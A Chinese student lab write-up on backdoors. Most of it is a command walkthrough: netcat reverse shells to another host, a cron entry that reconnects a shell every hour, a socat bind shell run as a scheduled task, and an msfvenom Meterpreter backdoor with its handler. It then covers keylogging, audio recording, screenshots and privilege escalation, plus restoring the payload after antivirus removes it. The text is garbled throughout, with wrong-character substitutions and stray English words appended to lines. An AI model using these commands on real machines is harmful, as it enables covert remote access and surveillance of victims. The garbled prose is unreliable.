Exp2 后门原理与实践 20154308张珊珊

一.基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?linux

  • 咱们在安装经常使用应用软件时,后门捆绑在下载的软件上,与软件一块儿安装进入了系统

2.例举你知道的后门如何启动起来(win及linux)的方式?git

  • windows:直接双击开启后门程序、经过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其余程序捆绑运行的后门程序
  • linux:设置了cron启动,在到达规定的时间时后门启动

3.Meterpreter有哪些给你映像深入的功能?web

  • 能够获取目标主机摄像头!虽而后面的实验中我并无成功,可是看别人的博客里都成功了,仍是很可怕的
  • 能够截图,万一一个涉密机被装了后门程序,那秘密文件岂不是被垂手可得地泄露了
  • 其实它的每个功能都让人感到惧怕

4.如何发现本身有系统有没有被安装后门?shell

  • 通常的后门程序都会被杀毒软件查杀,好比实验中的后门程序就被电脑管家消灭了,能被查杀的后门是否是很少了?
  • 对于厉害的后门,能够及时监控进程是否异常,数据流异常以及开机自启动项,看看有没有消耗cpu特别大的进程。

二.经常使用后门工具实验过程

2.1 Windows得到Linux Shell

1.在Win下,先使用ipconfig指令查看本机IP:172.30.6.22
vim

2.使用ncat.exe程序监听4308端口:ncat -l -p 4308windows

3.Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去链接Win的4308端口。
安全

4.链接成功后就能够在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。
网络

2.2 Linux得到Win Shell

1.在Linux下使用ifconfig命令查看本地主机IP:172.30.5.236
tcp

2.在Linux使用ncat.exe程序监听4308端口:nc -l -p 4308编辑器

3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去链接Linux的4308端口:ncat.exe -e cmd.exe 172.30.5.236 4308

4.链接成功后就能够在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

两个步骤相似,只是执行命令的主机相反。

2.3使用nc传输数据

netcat根据课上所学简单来说,就是利用tcp、udp链接进行基本的数据收发,在两台主机之间传输字符文件之类的,因此咱们在这里尝试用它在win和linux之间作一个后门。

1.Win使用ncat.exe -l 4308命令监听本机的4308端口。

2.Linux使用nc 172.30.5.22 4308命令去链接Win的4308端口,其中的ip地址应为linux的ip地址。

3.链接成功后便可传输数据,在linux终端输入的字符能够出如今win终端,而在win终端输入的字符也会出如今linux终端。如上图

4.也能够利用以下命令将文件里的内容做为输入,写入到另外一台主机的文件里

nc -l 1234 > filename.out

nc host.example.com 1234 < filename.in

2.4 nc定时启动

1.ncat.exe -l -p 4308 win运行ncat.exe监听4308端口。(忘记截图)

2.crontab -e Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。由于是第一次编辑,因此会提示选择编辑器,咱们选择3,利用最基本的vim编辑器进行编辑。
(再次忘记截图,由于当时卡在了怎么编辑文件,看到了某一个学姐的博客以后才知道,仍是基础知识掌握得不牢固,很不牢固,可是会加油的)

a进入编辑状态,在文件最后一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh 表示在每一个小时的第18分钟反向链接win的4308端口。

添加完后:wq存盘退出,配置即生效。

3.当时间到了18分时,win已经得到了linux的shell,能够输入ls等指令,而在18分之前,终端里是不会有任何反应的。

2.5 使用socat获取主机shell

1.在Win系统下,打开控制面板->系统和安全->管理工具->任务计划程序,建立任务,填写任务名称20154308

新建一个触发器,设置以下

2.下载socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files](老师的讲义里给的附件)

在操做->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4308 exec:cmd.exe,pty,stderr

3.建立完成以后,按Windows+L快捷键锁定计算机,再次打开时,能够发现以前建立的任务已经开始运行:

4.此时,在linux终端输入指令socat - tcp:172.30.6.22:4308,这里的第一个参数-表明标准的输入输出,第二个流链接到Wind主机的4308端口,此时能够发现已经成功得到了一个win shell:

2.6体验Meterpreter的功能

1.生成后门程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe

2.将生成的后门程序传送到Win主机上ncat.exe -lv 4308 > 20154308_backdoor.exe

3.在linux上使用msfconsole指令进入msf控制台,进行一系列以下设置

msfconsole进入msf(图案好像会不同,可是不太清楚是啥)

use exploit/multi/handler进入handler模式

set payload windows/meterpreter/reverse_tcp设置payload

set LHOST 172.30.5.236设置LHOST

set LPORT 4308设置LPORT

show options查看当前信息状态

exploitmsf开始监听

4.20154308_backdoor.exe在win上打开后门程序

5.而后能够发现linux已经得到了Win shell

6.接下来就能够利用msf作一些有趣的事情

record_mic录音

webcam_snap拍照(惋惜没有成功)

screenshot截屏

使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

三.实验遇到的问题

3.1 后门程序传送到win后,win没法打开后门程序

  • 稍微一想就会知道确定是杀毒软件的做用。因此打开虚拟机上的电脑管家,能够看到咱们所生成的后门程序20154308_backdoor.exe被查杀了
  • 因此咱们选择恢复,而后就能够在指定文件夹里找到这个程序了
  • 能够正常打开后门程序了

3.2 没法使用摄像头进行偷拍,非常难过,检查过设备管理器,确实是没有摄像头设备

  • 尝试过在虚拟机->可移动设备->Chiconyxxxxxxxxx这里选择链接主机,然而个人虚拟机里并无chicony这个选项可让我链接主机。失败
  • 尝试过在物理机的计算机管理->服务里启用全部与虚拟机相关的服务,然而并无反应。失败
  • 最后一个方法,我没骨气的选择了放弃

四.实验总结

  • 有趣可是很恐怖,可能我在作实验的时候就被人监视着一切(可是好像也没什么人会特意去监视我哈)
  • 杀毒软件确实仍是有一点用的,不知道在后面了解到免杀实验后我还会不会这么想
  • 此次的实验是比较简单?我写完博客就能掌握一些东西了,不像上次作完实验,其实仍是云里雾里,上了实验课以后才差很少明白一点。是我变厉害了?哈哈哈哈
  • 昨天听一个学长说,网络对抗这门课虽然课上听不懂(是真的听不懂,一节课下来不知道本身听到了什么),可是课下对照着实验指导书和别人写的博客,实际操做仍是蛮有意思的。我如今不只是以为有意思,更以为本身能从实际操做中掌握到一点点点点知识了,没白学吧这个课,就是但愿之后在课堂上能再听懂多一点东西
相关文章
相关标签/搜索